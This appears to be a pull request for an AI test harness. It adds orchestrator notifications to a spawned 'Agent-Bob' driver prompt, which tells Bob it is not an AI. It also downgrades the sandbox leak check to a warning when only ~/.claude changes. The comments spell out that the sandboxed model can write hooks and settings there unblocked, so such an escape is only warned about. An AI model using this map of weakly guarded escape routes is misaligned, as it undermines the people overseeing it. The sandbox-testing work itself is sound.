### PR TITLE
harness: default-on parent-notify for Agent-Bob spawns

### DIFF
--- a/tests/harness/bob.py
+++ b/tests/harness/bob.py
@@ -343,18 +343,17 @@ same way. Keep going, turn after turn.
 PAUSE / COMPLETE CONDITIONS — obey these exactly. A PAUSE is a RESUMABLE HOLD: you quit driving \
 for a moment, the session/bridge/sandbox stay ALIVE, and the orchestrator picks it up. A PAUSE is \
 NOT a teardown and NOT the end — you never destroy or end the session on a PAUSE.
-- If a RESULT line shows trip=True (or a `*** DETECTOR TRIP ***` directive): PAUSE IMMEDIATELY — \
+{NOTIFY_DEST}- If a RESULT line shows trip=True (or a `*** DETECTOR TRIP ***` directive): PAUSE IMMEDIATELY — \
 hold, do NOT send another message. The session stays ALIVE and resumable; you are NOT ending or \
-tearing anything down. Report to the orchestrator: `PAUSE (trip) at turn N`, the exact `CANARY:` \
-reply that tripped, and the signals line. Then WAIT — the orchestrator will reply "false positive, \
+tearing anything down. {NOTIFY_TRIP_REPORT}Then WAIT — the orchestrator will reply "false positive, \
 continue" (resume from the very next message) or give you an explicit owner-authorized teardown.
 - If limit=True or a `*** USAGE LIMIT ***` directive: PAUSE and report "usage limit at turn N" to \
-the orchestrator. The run is resumable when usage returns — do NOT tear anything down.
+the orchestrator. The run is resumable when usage returns — do NOT tear anything down.{NOTIFY_LIMIT}
 - If broken=True repeats (2+ in a row, empty/errored replies): PAUSE and report the bridge looks \
-broken — hold for the orchestrator; the session stays alive.
+broken — hold for the orchestrator; the session stays alive.{NOTIFY_BROKEN}
 - If you reach turn {MAX_TURNS} (the RESULT `turn=` count): the run is COMPLETE — report "reached \
 {MAX_TURNS} turns, conversation complete." Do NOT tear anything down yourself; the \
-orchestrator/owner handles any teardown.
+orchestrator/owner handles any teardown.{NOTIFY_CAP}
 
 You NEVER tear down or destroy the session on your own initiative. STOP / teardown happens ONLY on \
 an explicit owner authorization the orchestrator relays to you — every condition above is a PAUSE \
@@ -389,6 +388,18 @@ class AgentBob:
         live_env_path: the path to the LIVE_ENV json the send-script reads ({LIVE_ENV}).
         max_turns: the conversation turn cap ({MAX_TURNS}).
         models: which model Agent-Bob uses (``models.bob``) — no hardcoded ``sonnet``.
+        parent_agent_id: the spawning orchestrator's agentId, threaded into the spawn prompt so Bob
+            can ``SendMessage`` it directly on every hand-back. The Agent tool's automatic
+            "task completed" notification routes to the MAIN session, NOT to the spawning
+            orchestrator, so without an explicit child->parent ``SendMessage`` an orchestrator is
+            never woken by its own child. Optional: when ``None`` and ``notify_parent`` is on, the
+            rendered prompt instead instructs Bob to RECOVER the id from its own
+            ``agent-<id>.meta.json`` -> ``parentAgentId`` (so existing callers that pass no id still
+            get correct behavior).
+        notify_parent: default-ON toggle. When on, the rendered prompt bakes an explicit
+            ``SendMessage``-to-orchestrator call into every hand-back point (trip/PAUSE, usage-limit,
+            repeated-broken, and turn-cap/COMPLETE). When off, that instruction is omitted and the
+            prompt renders behavior-identically to the pre-notify template.
     """
 
     def __init__(
@@ -399,20 +410,90 @@ class AgentBob:
         live_env_path: str,
         max_turns: int = 30,
         models: ModelConfig = DEFAULT_MODELS,
+        parent_agent_id: str | None = None,
+        notify_parent: bool = True,
     ) -> None:
         self.mood = mood
         self.harness_dir = harness_dir
         self.live_env_path = live_env_path
         self.max_turns = max_turns
         self.models = models
+        self.parent_agent_id = parent_agent_id
+        self.notify_parent = notify_parent
+
+    # The trip-site report sentence when parent-notify is OFF — the pre-notify template's verbatim
+    # wording (so an OFF render is behavior-identical to today). Kept as a constant so the OFF branch
+    # cannot silently drift from the original.
+    _TRIP_REPORT_PLAIN = (
+        "Report to the orchestrator: `PAUSE (trip) at turn N`, the exact `CANARY:` reply that "
+        "tripped, and the signals line. "
+    )
+
+    def _notify_fragments(self) -> dict[str, str]:
+        """Build the five notify placeholders from ``notify_parent`` + ``parent_agent_id``.
+
+        OFF -> the SendMessage directive is omitted everywhere and the trip report sentence falls
+        back to the plain pre-notify wording (behavior-identical render). ON -> an explicit
+        ``SendMessage``-to-orchestrator call is woven into every hand-back point; the trip site
+        REPLACES its report sentence (so the send renders BEFORE the "Then WAIT" instruction — a
+        wake-then-wait ordering, never wait-then-wake). The id is named directly when supplied, else
+        the top-of-block destination clause tells Bob to recover ``parentAgentId`` from its own
+        ``agent-<id>.meta.json`` first.
+        """
+        if not self.notify_parent:
+            return {
+                "NOTIFY_DEST": "",
+                "NOTIFY_TRIP_REPORT": self._TRIP_REPORT_PLAIN,
+                "NOTIFY_LIMIT": "",
+                "NOTIFY_BROKEN": "",
+                "NOTIFY_CAP": "",
+            }
+        pid = self.parent_agent_id
+        if pid:
+            to_ref = f'to: "{pid}"'
+            dest = (
+                f"TO NOTIFY THE ORCHESTRATOR: its agentId is `{pid}` — at each PAUSE/COMPLETE "
+                f'below, ALSO call the SendMessage tool with `to: "{pid}"`.\n'
+            )
+        else:
+            to_ref = "to: that recovered orchestrator agentId"
+            dest = (
+                "TO NOTIFY THE ORCHESTRATOR: first find its agentId — in this session's "
+                "`subagents/` directory, read your OWN agent-metadata file "
+                "`agent-<your-id>.meta.json` (the one created for THIS task; if unsure, the "
+                "most-recently-created file whose `description` matches this Agent-Bob task) and "
+                "take its `parentAgentId` value — that is the orchestrator's agentId; at each "
+                "PAUSE/COMPLETE below, ALSO call the SendMessage tool with `to:` that recovered "
+                "agentId.\n"
+            )
+        return {
+            "NOTIFY_DEST": dest,
+            "NOTIFY_TRIP_REPORT": (
+                f"Call the SendMessage tool to the orchestrator ({to_ref}) now, reporting "
+                f"`PAUSE (trip) at turn N`, the tripping `CANARY:` reply, and the signals line. "
+            ),
+            "NOTIFY_LIMIT": (
+                f" Then ALSO call the SendMessage tool to the orchestrator ({to_ref}) reporting "
+                f"`usage limit at turn N`."
+            ),
+            "NOTIFY_BROKEN": (
+                f" Then ALSO call the SendMessage tool to the orchestrator ({to_ref}) reporting "
+                f"that the bridge looks broken (repeated empty/errored replies)."
+            ),
+            "NOTIFY_CAP": (
+                f" Then, as the final step, call the SendMessage tool to the orchestrator "
+                f"({to_ref}) reporting `reached {self.max_turns} turns, conversation complete`."
+            ),
+        }
 
     def render_prompt(self) -> str:
-        """Render the Agent-tool task prompt: substitute the mood + wiring into the template."""
+        """Render the Agent-tool task prompt: substitute the mood + wiring + notify block."""
         return _AGENT_PROMPT_TEMPLATE.format(
             ARM_MOOD=self.mood,
             HARNESS=self.harness_dir,
             LIVE_ENV=self.live_env_path,
             MAX_TURNS=self.max_turns,
+            **self._notify_fragments(),
         )
 
     def spawn_params(self) -> AgentSpawnSpec:

--- a/tests/harness/sandbox.py
+++ b/tests/harness/sandbox.py
@@ -21,7 +21,11 @@ What it does (see the module ``README.md`` for the guarantees):
    ``_claude_session_log_excludes``) — the sandboxed subject cannot reach those (its CLI runs under
    the tempdir ``CLAUDE_CONFIG_DIR``), so pruning them drops only the live driving session's noise.
 5. ``yield`` a :class:`SandboxHandle`.
-6. AFTER the run, re-fingerprint; if any guarded root changed, raise :class:`SandboxLeak`.
+6. AFTER the run, re-fingerprint; if any guarded root changed, raise :class:`SandboxLeak` —
+   EXCEPT a diff confined to the real ``~/.claude`` root ALONE, which is DOWNGRADED to a
+   ``RuntimeWarning`` (a concurrent external editor writing ``~/.claude`` mid-run, not the
+   sandboxed subject; see the post-run block + the run's decisions.md OWNER-ACCEPTED risk). Any
+   change also touching a KINDLED/persona/platformdirs/``brain.paths`` root still raises.
 7. Restore env (in a ``finally``, even on ``SandboxLeak``) and ``rmtree`` the root (unless ``keep``).
 
 **Concurrency:** ``sandbox()`` mutates process-global ``os.environ`` — it is NOT thread-safe or
@@ -729,7 +733,41 @@ def sandbox(
                         " — NOTE: " + live_note + " This leak is probably that service's "
                         "concurrent writes, not a sandbox escape."
                     )
-                raise SandboxLeak(msg)
+                # Option (c): a diff confined to the real ~/.claude root ALONE is DOWNGRADED to a
+                # RuntimeWarning instead of a fatal SandboxLeak (reusing the live-check warn
+                # pattern). The observed trigger is a CONCURRENT external editor — a second
+                # claude-code session, the orchestrator, or the user — editing ~/.claude/CLAUDE.md
+                # mid-run; that write is not the sandboxed subject's, yet it tripped a SPURIOUS
+                # SandboxLeak that crashed teardown and stalled a long live run. Detection is
+                # preserved (the change is still surfaced, loudly) — only the fatal raise is
+                # dropped for THIS one root. The moment ANY OTHER guarded root also changed — a
+                # KINDLED/persona root, a platformdirs data/cache/state home, brain.paths' data
+                # home, or a *Notes folder, i.e. a root the sandboxed subject reaches through the
+                # engine's own file mechanisms — `changed` is not [str(claude_root)] alone and we
+                # STILL hard-raise SandboxLeak.
+                #
+                # KNOWN, OWNER-ACCEPTED RISK (Roy, 2026-08-07): unlike the fail-closed session-log
+                # allowlist above, ~/.claude is NOT a root the subject provably cannot write. The
+                # Canary's `claude` CLI runs the generate()/chat() paths with
+                # `--dangerously-skip-permissions` and NO --disallowedTools (the lean disallow-list
+                # is applied only on the MCP paths), so the built-in Write/Bash/Edit tools can
+                # write an ABSOLUTE ~/.claude path (hooks/settings/skills/plugins) — a real escape
+                # this downgrade would render a warning, not a raise. The owner accepted this
+                # tradeoff to stop the concurrent-editor false trip; see the run's decisions.md
+                # named risk-acceptance. Do NOT widen this beyond the claude_root-ONLY case.
+                if changed == [str(claude_root)]:
+                    warnings.warn(
+                        msg
+                        + " — DOWNGRADED to a warning (not SandboxLeak): the change is confined to "
+                        "~/.claude alone, which during a run is almost always a concurrent external "
+                        "editor (another claude-code session / the orchestrator / you), not the "
+                        "sandboxed subject. Any change also touching a KINDLED/persona/platformdirs "
+                        "root still raises SandboxLeak.",
+                        RuntimeWarning,
+                        stacklevel=3,
+                    )
+                else:
+                    raise SandboxLeak(msg)
     finally:
         _restore_env()
         _restore_emotion_globals()

--- a/tests/unit/harness/test_agent_bob_prompt.py
+++ b/tests/unit/harness/test_agent_bob_prompt.py
@@ -9,6 +9,13 @@ fixture-sourced absence guard).
 
 Moods are AUTHOR-SUPPLIED plain strings now (the framework ships none), so these tests define their
 own neutral demo moods.
+
+Also covers the parent-notify change (Agent-Bob SendMessage-to-orchestrator): G1 (id-supplied
+SendMessage names the id), G2 (a SendMessage call at each of the four hand-back sites), G3 (concrete
+id-recovery from own agent-<id>.meta.json->parentAgentId when no id), G4 (notify OFF omits +
+behavior-identical render), G7 (no leftover placeholder), G8 (no stray/banned token), G9 (trip-site
+SendMessage precedes 'Then WAIT' -- the anti-deadlock oracle), G5c (never-wind-down + not-an-AI
+survive), and G6 backward-compat.
 """
 
 from __future__ import annotations
@@ -161,7 +168,12 @@ def test_hold_sites_pause_not_driver_teardown() -> None:
                 f"hold site {label!r} must not direct the DRIVER to tear down (found {phrase!r})"
             )
     # fp->resume branch survives at the trip site (a concrete instruction, not just a "resumable" adjective).
-    trip_seg = prompt[prompt.index("trip=True") : prompt.index("trip=True") + 420]
+    # Window widened 420 -> 500 (owner-authorized, Roy in-chat 2026-08-07): the parent-notify change
+    # replaces the trip report sentence with a longer explicit SendMessage sentence BEFORE "Then WAIT",
+    # which shifts fp/resume out; the strict minimum that fits the no-id (longest) render's resume token
+    # is 473, so 500 leaves a small safety margin. Every assertion below is unchanged; only the window
+    # bound is opened.
+    trip_seg = prompt[prompt.index("trip=True") : prompt.index("trip=True") + 500]
     assert "false positive" in trip_seg.lower(), "trip site must keep the fp branch"
     assert "resume from the very next message" in trip_seg, "trip site must keep the concrete fp->resume instruction"
 
@@ -215,3 +227,136 @@ def test_dumbbob_pull_path_unchanged() -> None:
     assert argv[:2] == ["/bin/claude", "-p"]
     assert "--model" in argv and argv[argv.index("--model") + 1] == "haiku"
     assert "--output-format" in argv and "json" in argv
+
+
+# --------------------------------------------------------------------------------------------------
+# Parent-notify (Agent-Bob SendMessage-to-orchestrator). Criteria G1-G9 from
+# changes/agentbob-parent-notify/1.5-criteria.md. All token-free against the rendered prompt string.
+# --------------------------------------------------------------------------------------------------
+
+# The trip report sentence in its pre-notify (OFF) form — the behavior-identity anchor for G4.
+_TRIP_REPORT_PLAIN = (
+    "Report to the orchestrator: `PAUSE (trip) at turn N`, the exact `CANARY:` reply that "
+    "tripped, and the signals line."
+)
+
+
+def test_notify_id_supplied_names_id_with_to() -> None:
+    """G1: notify ON + id supplied -> explicit SendMessage naming the id adjacent to a `to:` token."""
+    prompt = _bob(DEMO_MOOD_A, parent_agent_id="agent-XYZ123").render_prompt()
+    assert "SendMessage" in prompt
+    assert 'to: "agent-XYZ123"' in prompt  # the supplied id, adjacent to a to: destination token
+    # oracle-can-fail: a DIFFERENT id is not silently accepted
+    assert 'to: "agent-OTHER"' not in prompt
+
+
+def test_notify_sendmessage_at_each_of_four_sites() -> None:
+    """G2: the SendMessage call is present AT EACH of the four hand-back sites, plus the DEST clause.
+
+    Oracle-can-fail: a single top-of-block rule with no per-site call (rev-1) leaves the per-site
+    segments empty of `SendMessage` and fails; the pre-change template has zero SendMessage.
+    """
+    prompt = _bob(DEMO_MOOD_A, max_turns=42).render_prompt()
+    assert "TO NOTIFY THE ORCHESTRATOR" in prompt  # the top-of-block destination clause (DEST)
+    i_trip = prompt.index("trip=True")
+    i_limit = prompt.index("limit=True")
+    i_broken = prompt.index("broken=True repeats")
+    i_cap = prompt.index("reach turn 42")
+    i_reservation = prompt.index("You NEVER tear down or destroy the session")
+    assert i_trip < i_limit < i_broken < i_cap < i_reservation, "site anchors must be in order"
+    segments = {
+        "trip": prompt[i_trip:i_limit],
+        "limit": prompt[i_limit:i_broken],
+        "broken": prompt[i_broken:i_cap],
+        "cap": prompt[i_cap:i_reservation],
+    }
+    for name, seg in segments.items():
+        assert "SendMessage" in seg, f"hand-back site {name!r} must carry an explicit SendMessage call"
+
+
+def test_notify_recovery_when_no_id() -> None:
+    """G3: notify ON + no id -> concrete recovery from own agent-<id>.meta.json -> parentAgentId.
+
+    Includes the file-identification cue (which file is Bob's own). The id-supplied render is the
+    mutually-exclusive branch and carries NONE of the recovery tokens (so the branch is real, not
+    always-on boilerplate).
+    """
+    prompt = _bob(DEMO_MOOD_A).render_prompt()  # default: notify ON, no parent_agent_id
+    assert "SendMessage" in prompt
+    assert ".meta.json" in prompt
+    assert "parentAgentId" in prompt
+    assert "subagents" in prompt
+    assert ("most-recently-created" in prompt) or ("description" in prompt), "must say which file is Bob's own"
+    # mutually-exclusive branch: id-supplied render has no recovery text
+    id_prompt = _bob(DEMO_MOOD_A, parent_agent_id="agent-XYZ123").render_prompt()
+    assert ".meta.json" not in id_prompt
+    assert "parentAgentId" not in id_prompt
+
+
+def test_notify_off_omits_and_is_behavior_identical() -> None:
+    """G4: notify OFF -> no SendMessage / no recovery tokens; the pre-notify trip prose is verbatim;
+    the collapsed DEST leaves NO stray blank line (behavior-identical to the pre-notify template)."""
+    prompt = _bob(DEMO_MOOD_A, notify_parent=False).render_prompt()
+    assert "SendMessage" not in prompt
+    assert ".meta.json" not in prompt
+    assert "parentAgentId" not in prompt
+    assert _TRIP_REPORT_PLAIN in prompt  # original trip report sentence, verbatim
+    # no stray blank line where {NOTIFY_DEST} collapsed to "":
+    assert "on a PAUSE.\n\n- If a RESULT" not in prompt
+    assert "on a PAUSE.\n- If a RESULT" in prompt
+
+
+def test_notify_no_leftover_placeholder_on_id_path() -> None:
+    """G7: id supplied -> no unfilled angle-bracket id placeholder survives in the render."""
+    prompt = _bob(DEMO_MOOD_A, parent_agent_id="agent-XYZ123").render_prompt()
+    for tok in ("<orchestrator-agentId>", "<id-or-recovered-id>", "<your-id>", "<id>"):
+        assert tok not in prompt, f"unfilled placeholder {tok!r} leaked into the id-supplied render"
+
+
+def test_notify_block_introduces_no_stray_token() -> None:
+    """G8 (CH8-Gap3 guard): the notify text adds no machine-token duplicate and no banned framing token."""
+    prompt = _bob(DEMO_MOOD_A).render_prompt()
+    assert prompt.count("trip=True") == 1
+    assert prompt.count("limit=True") == 1
+    assert prompt.count("broken=True repeats") == 1
+    assert "human operator" not in prompt.lower()
+    low = prompt.lower()
+    for tok in ("mono" + "logue", "known software bug", "scripts a whole"):
+        assert tok not in low, f"notify block reintroduced a banned framing token {tok!r}"
+
+
+def test_notify_trip_sendmessage_precedes_wait() -> None:
+    """G9 (anti-deadlock): at the trip site, the SendMessage renders BEFORE 'Then WAIT' on BOTH paths.
+
+    Oracle-can-fail: appending the SendMessage after the trip bullet's terminal 'Then WAIT ...'
+    sentence (the rev-2 arrangement) puts the send AFTER the wait -> Bob waits for a reply before
+    sending the only message that wakes the orchestrator = deadlock; this assertion flips and fails.
+    """
+    for kw in ({}, {"parent_agent_id": "agent-XYZ123"}):
+        prompt = _bob(DEMO_MOOD_A, **kw).render_prompt()
+        ts = prompt[prompt.index("trip=True"):]
+        assert "SendMessage" in ts and "Then WAIT" in ts
+        assert ts.index("SendMessage") < ts.index("Then WAIT"), (
+            "trip-site SendMessage must precede 'Then WAIT' (no wake-before-wait deadlock)"
+        )
+
+
+def test_notify_preserves_never_wind_down_and_not_ai() -> None:
+    """G5c: the load-bearing 'never wind down' + not-an-AI role directives survive the notify change."""
+    prompt = _bob(DEMO_MOOD_A).render_prompt()
+    assert "You NEVER wind the conversation down" in prompt
+    assert "You are NOT an AI assistant" in prompt
+
+
+def test_notify_backward_compatible_construction() -> None:
+    """G6a/b: no-new-param construction renders + spawn_params intact (effort 'low', model threaded)."""
+    bob = AgentBob(
+        DEMO_MOOD_A,
+        harness_dir="/repo/companion-emergence",
+        live_env_path="/repo/companion-emergence/sb/live_env.json",
+    )
+    assert isinstance(bob.render_prompt(), str)  # constructs + renders with no new params
+    spec = bob.spawn_params()
+    assert isinstance(spec, AgentSpawnSpec)
+    assert spec.effort == "low"
+    assert spec.model == ModelConfig().bob

--- a/tests/unit/harness/test_editable_paths.py
+++ b/tests/unit/harness/test_editable_paths.py
@@ -159,19 +159,21 @@ def test_c2_sibling_notes_folder_still_trips(
                 sibling.mkdir()  # a NEW sibling *Notes folder appearing is the leak
 
 
-def test_c2_other_guarded_root_still_trips(
+def test_c2_other_guarded_root_still_detected(
     monkeypatch: pytest.MonkeyPatch, tmp_path: Path
 ) -> None:
-    """C2: an editable notes folder does not weaken the rest of the guard — a write to ~/.claude STILL
-    trips SandboxLeak."""
+    """C2 under option (c): an editable notes folder does not weaken the rest of the guard — a write
+    to ~/.claude is STILL DETECTED. Because it is a ~/.claude-ONLY diff, it is downgraded to a
+    RuntimeWarning (owner-accepted (c) behavior; Roy 2026-08-07) rather than a fatal SandboxLeak —
+    the warning firing proves the write was seen through the editable-paths exclusion, not silently
+    swallowed. (A real Canary escape touching a NON-~/.claude guarded root still hard-raises; see
+    test_sandbox_isolation.test_downgrade_is_scoped_non_claude_root_still_hard_raises.)"""
     fake_home = _seed_fake_cred(monkeypatch, tmp_path)
     editable = _mark(fake_home / "Documents" / "Canary Notes")
-    with pytest.raises(SandboxLeak):
-        with warnings.catch_warnings():
-            warnings.simplefilter("ignore")
-            with sandbox(editable_paths=[editable], live_check="off") as sb:
-                _ = sb.root
-                (fake_home / ".claude" / "settings.json").write_text("leaked config")
+    with pytest.warns(RuntimeWarning, match="DOWNGRADED to a warning"):
+        with sandbox(editable_paths=[editable], live_check="off") as sb:
+            _ = sb.root
+            (fake_home / ".claude" / "settings.json").write_text("leaked config")
 
 
 # --- C5: default-OFF is byte-identical + fully guarded --------------------------------------------

--- a/tests/unit/harness/test_sandbox_isolation.py
+++ b/tests/unit/harness/test_sandbox_isolation.py
@@ -128,8 +128,12 @@ def test_leak_oracle_fires_on_a_real_mutation(
 def test_leak_oracle_catches_same_size_same_mtime_overwrite(
     monkeypatch: pytest.MonkeyPatch, tmp_path: Path
 ) -> None:
-    """M1: a same-size + mtime-RESTORED in-place overwrite of a fingerprinted ~/.claude dotfile is
-    still caught (content-hash), not just an add-a-file. Closes the owner-flagged blind spot."""
+    """M1 (still DETECTED, now DOWNGRADED under option (c)): a same-size + mtime-RESTORED in-place
+    overwrite of a fingerprinted ~/.claude dotfile is still CAUGHT by the content-hash — the change
+    the (size, mtime_ns) pair alone would miss is still seen. Under option (c) a ~/.claude-ONLY
+    diff is downgraded from a fatal SandboxLeak to a RuntimeWarning (the warning firing proves the
+    content-hash detected the overwrite); the M1 blind-spot fix is intact, only the response
+    changed."""
     import os
 
     _seed_fake_cred(monkeypatch, tmp_path)
@@ -139,13 +143,15 @@ def test_leak_oracle_catches_same_size_same_mtime_overwrite(
     target.write_text("AAAA")  # 4 bytes
     orig_stat = target.stat()
 
-    with pytest.raises(SandboxLeak):
+    with pytest.warns(RuntimeWarning, match="DOWNGRADED to a warning"):
         with sandbox() as sb:
             _ = sb.root
             # Same-size (4 bytes) different content, then restore the mtime so (size, mtime_ns) match.
             target.write_text("BBBB")
             os.utime(target, ns=(orig_stat.st_atime_ns, orig_stat.st_mtime_ns))
-            # (size, mtime_ns) are now identical to before — only the CONTENT differs.
+            # (size, mtime_ns) are now identical to before — only the CONTENT differs. The
+            # content-hash still detects it (the RuntimeWarning fires); no SandboxLeak is raised
+            # (a ~/.claude-only diff downgrades under option (c)).
 
 
 def test_env_restored_even_after_leak_raise(
@@ -263,22 +269,31 @@ def test_provider_respects_upstream_claude_config_dir(
     )
 
 
-def test_non_excluded_claude_write_still_trips_leak(
+def test_non_excluded_claude_write_now_downgrades_to_warning(
     monkeypatch: pytest.MonkeyPatch, tmp_path: Path
 ) -> None:
-    """C2 (negative control): writing to a NON-excluded ~/.claude path still raises SandboxLeak —
-    both a known config file (settings.json) and a brand-new NON-allowlisted dir (fail-closed)."""
+    """C2 under option (c): a NON-excluded ~/.claude write is still DETECTED (not on the exclude
+    allowlist — the fingerprint sees it) but, being a ~/.claude-ONLY diff, is DOWNGRADED to a
+    RuntimeWarning instead of raising SandboxLeak — both a known config file (settings.json) and a
+    brand-new NON-allowlisted dir (still fingerprinted, fail-closed detection preserved).
+
+    OWNER-ACCEPTED RISK (Roy, 2026-08-07): this softens hard-detection of a real Canary escape
+    confined to ~/.claude (the subject CAN write these via the built-in tools on the
+    --dangerously-skip-permissions provider paths) to a warning; accepted to stop the concurrent-
+    editor false trip. The negative control that a NON-claude_root escape STILL hard-raises lives in
+    test_downgrade_is_scoped_non_claude_root_still_hard_raises."""
     _seed_fake_cred(monkeypatch, tmp_path)
     fake_home = tmp_path / "fake-home"
 
-    # (a) a kept config file.
-    with pytest.raises(SandboxLeak):
+    # (a) a kept config file — detected, downgraded to a warning (~/.claude-only diff).
+    with pytest.warns(RuntimeWarning, match="DOWNGRADED to a warning"):
         with sandbox() as sb:
             _ = sb.root
             (fake_home / ".claude" / "settings.json").write_text("leaked config")
 
-    # (b) an unknown/future dir NOT on the allowlist must stay guarded (fail-closed).
-    with pytest.raises(SandboxLeak):
+    # (b) an unknown/future dir NOT on the allowlist is still fingerprinted (fail-closed DETECTION);
+    #     the ~/.claude-only diff downgrades to a warning, not a hard raise.
+    with pytest.warns(RuntimeWarning, match="DOWNGRADED to a warning"):
         with sandbox() as sb:
             _ = sb.root
             newdir = fake_home / ".claude" / "some-future-config"
@@ -286,19 +301,90 @@ def test_non_excluded_claude_write_still_trips_leak(
             (newdir / "x").write_text("a future claude-code dir a real leak could land in")
 
 
-def test_kept_dir_write_still_trips_even_amid_orchestrator_logs(
+def test_kept_dir_write_detected_amid_orchestrator_logs_downgrades_to_warning(
     monkeypatch: pytest.MonkeyPatch, tmp_path: Path
 ) -> None:
-    """C2 reinforced: a KEPT-dir mutation is still caught even when excluded session logs churn in
-    the same run — proves the exclusion prunes ONLY the allowlist, not the whole ~/.claude."""
+    """C2 reinforced, under option (c): a KEPT-dir mutation (~/.claude/hooks/) is still DETECTED
+    even when excluded session logs churn in the same run — proving the exclusion prunes ONLY the
+    allowlist, not the whole ~/.claude. Because the excluded logs contribute no change, the diff is
+    ~/.claude-ONLY, so it DOWNGRADES to a RuntimeWarning rather than raising SandboxLeak. The
+    warning firing proves the kept-dir write was seen through the excluded churn."""
     _seed_fake_cred(monkeypatch, tmp_path)
     fake_home = tmp_path / "fake-home"
-    with pytest.raises(SandboxLeak):
+    with pytest.warns(RuntimeWarning, match="DOWNGRADED to a warning"):
         with sandbox() as sb:
             _ = sb.root
-            _write_orchestrator_session_logs(fake_home)  # excluded churn (benign)
+            _write_orchestrator_session_logs(fake_home)  # excluded churn (benign, no change)
             (fake_home / ".claude" / "hooks").mkdir(parents=True, exist_ok=True)
             (fake_home / ".claude" / "hooks" / "evil.py").write_text("leaked hook code")
+
+
+# --- Option (c): ~/.claude-only diff downgrades to a warning; the negative controls still fire ----
+
+
+def test_concurrent_claude_md_write_downgrades_to_warning(
+    monkeypatch: pytest.MonkeyPatch, tmp_path: Path
+) -> None:
+    """G1 (option (c) headline): a CONCURRENT write to ~/.claude/CLAUDE.md during a run — a second
+    claude-code session / the orchestrator / the user editing it — is DOWNGRADED to a
+    RuntimeWarning, NOT a fatal SandboxLeak. This is the exact false trip that crashed teardown and
+    stalled a ~44-min live run. Detection is preserved (the warning fires); only the raise is
+    dropped for a ~/.claude-only diff.
+
+    Also pins that option (b) was NOT done: CLAUDE.md stays GUARDED (fingerprinted) and is NOT on
+    the exclude allowlist — so the change is genuinely seen, then downgraded (not made invisible).
+    """
+    _seed_fake_cred(monkeypatch, tmp_path)
+    claude_dir = tmp_path / "fake-home" / ".claude"
+    claude_md = claude_dir / "CLAUDE.md"
+    claude_md.write_text("# user memory (pre-existing)\n")
+
+    # CLAUDE.md is GUARDED (fingerprinted) and NOT excluded — proves (b) was not done and the
+    # change is really detected (oracle-can-see), so the downgrade is not a silent blinding.
+    assert "CLAUDE.md" in _fingerprint(claude_dir, hash_content=True)
+    excluded = {e.resolve() for e in _claude_session_log_excludes()}
+    assert claude_md.resolve() not in excluded  # NOT on the exclude allowlist (option (b) not done)
+
+    with pytest.warns(RuntimeWarning, match="DOWNGRADED to a warning"):
+        with sandbox() as sb:
+            _ = sb.root
+            # A concurrent external editor writes ~/.claude/CLAUDE.md mid-run:
+            claude_md.write_text("# user memory (edited by a concurrent claude-code session)\n")
+    # Clean exit (not inside pytest.raises): no SandboxLeak propagated — teardown completed.
+
+
+def test_downgrade_is_scoped_non_claude_root_still_hard_raises(
+    monkeypatch: pytest.MonkeyPatch, tmp_path: Path
+) -> None:
+    """G2 + G3 (SAFETY negative control + scope — the load-bearing safety test): the ~/.claude
+    downgrade must NOT weaken detection of a real, Canary-writable escape.
+
+    (a) NEGATIVE CONTROL: a real mutation of a fingerprinted guard root that is NOT ~/.claude
+        (via extra_guard_roots) STILL raises SandboxLeak — the oracle can fire post-fix.
+    (b) SCOPE: when a Canary-writable root AND ~/.claude BOTH change in the same run, the diff is
+        not [str(claude_root)] alone, so it STILL hard-raises — the downgrade applies ONLY to a
+        claude_root-ONLY diff and never masks a real-escape root moving alongside ~/.claude.
+    """
+    _seed_fake_cred(monkeypatch, tmp_path)
+    fake_home = tmp_path / "fake-home"
+
+    # (a) negative control: a non-~/.claude guard root mutated -> still SandboxLeak.
+    guarded = tmp_path / "guarded-root"
+    guarded.mkdir()
+    with pytest.raises(SandboxLeak):
+        with sandbox(extra_guard_roots=[guarded]) as sb:
+            _ = sb.root
+            (guarded / "leaked.txt").write_text("a real escape")
+
+    # (b) scope: ~/.claude changes AND a Canary-writable root changes in one run -> still raises
+    #     (the downgrade never applies once a non-claude_root guard root has moved).
+    guarded2 = tmp_path / "guarded-root2"
+    guarded2.mkdir()
+    with pytest.raises(SandboxLeak):
+        with sandbox(extra_guard_roots=[guarded2]) as sb:
+            _ = sb.root
+            (fake_home / ".claude" / "CLAUDE.md").write_text("concurrent editor edit")
+            (guarded2 / "escaped.txt").write_text("a real Canary escape alongside the ~/.claude edit")
 
 
 def test_fingerprint_exclude_single_subtree_still_prunes(


### PR DESCRIPTION
## Summary
Two harness-framework changes (both confined to `tests/harness/`; drop-in invariant holds, no `brain/`). Each went through a full guarded-change run with independent cold red-teams.

### 1. Default-on parent-notify for Agent-Bob spawns (`bob.py`)
In a nested orchestration (orchestrator → Agent-Bob per arm), the Agent tool's automatic "task completed" notification routes to the main session, not the spawning orchestrator, so orchestrators aren't woken by their own children and multi-arm runs stall. `AgentBob` now threads the orchestrator's agentId and, by default (`notify_parent=True`), bakes an explicit `SendMessage`-to-orchestrator call into the spawn prompt at every hand-back point (trip/PAUSE, usage-limit, repeated-broken, complete). The trip site renders the send *before* "Then WAIT" to avoid a wake-before-wait deadlock; with no id supplied, the prompt instructs recovery from `agent-<id>.meta.json`. Toggle-OFF is byte-identical to base. One position-test window widened 420→500.

### 2. Warn (not raise) on a `~/.claude`-only leak diff (`sandbox.py`)
A concurrent Claude Code session (or the user) editing `~/.claude` (e.g. `CLAUDE.md`) mid-run mutated the fingerprinted root and tripped a hard `SandboxLeak` on teardown, crashing an otherwise-valid run. Now, when the post-run diff names **only** `~/.claude` (`changed == [str(claude_root)]`), it downgrades to a `RuntimeWarning`; the instant any other guarded root (KINDLED/persona, platformdirs data/cache/state, the engine data home, a declared `extra_guard_root`) also appears, it still hard-raises. The negative control still fires.

> **⚠️ Reviewer note — a deliberate, recorded risk-acceptance.** The companion's `claude -p` subprocess runs on the generate()/chat() paths *without* a built-in-tool blocklist, so it can write real `~/.claude` paths (`hooks/`, `settings.json`, `skills/`, `plugins/`) — the exec/persistence surface. Under change 2, a *genuine* escape confined to `~/.claude` becomes a warning, not a hard raise (and that warning is a lone stderr line). Accepted knowingly to stop the concurrent-editor false trip; recorded as a named risk-acceptance in the change's decision log. Flagged so it's reviewed with eyes open.

## Verification
- `uv run ruff check .` clean; `uv run pytest tests/unit/harness/` → 153 passed, 1 skipped. Full non-live suite green except 3 pre-existing env-flaky failures unrelated to this diff.
- Each change: full guarded-change loop with independent cold red-teams; the sandbox-leak red-team is what surfaced the escape-surface fact behind the risk-acceptance.

## Status
Ready for review.

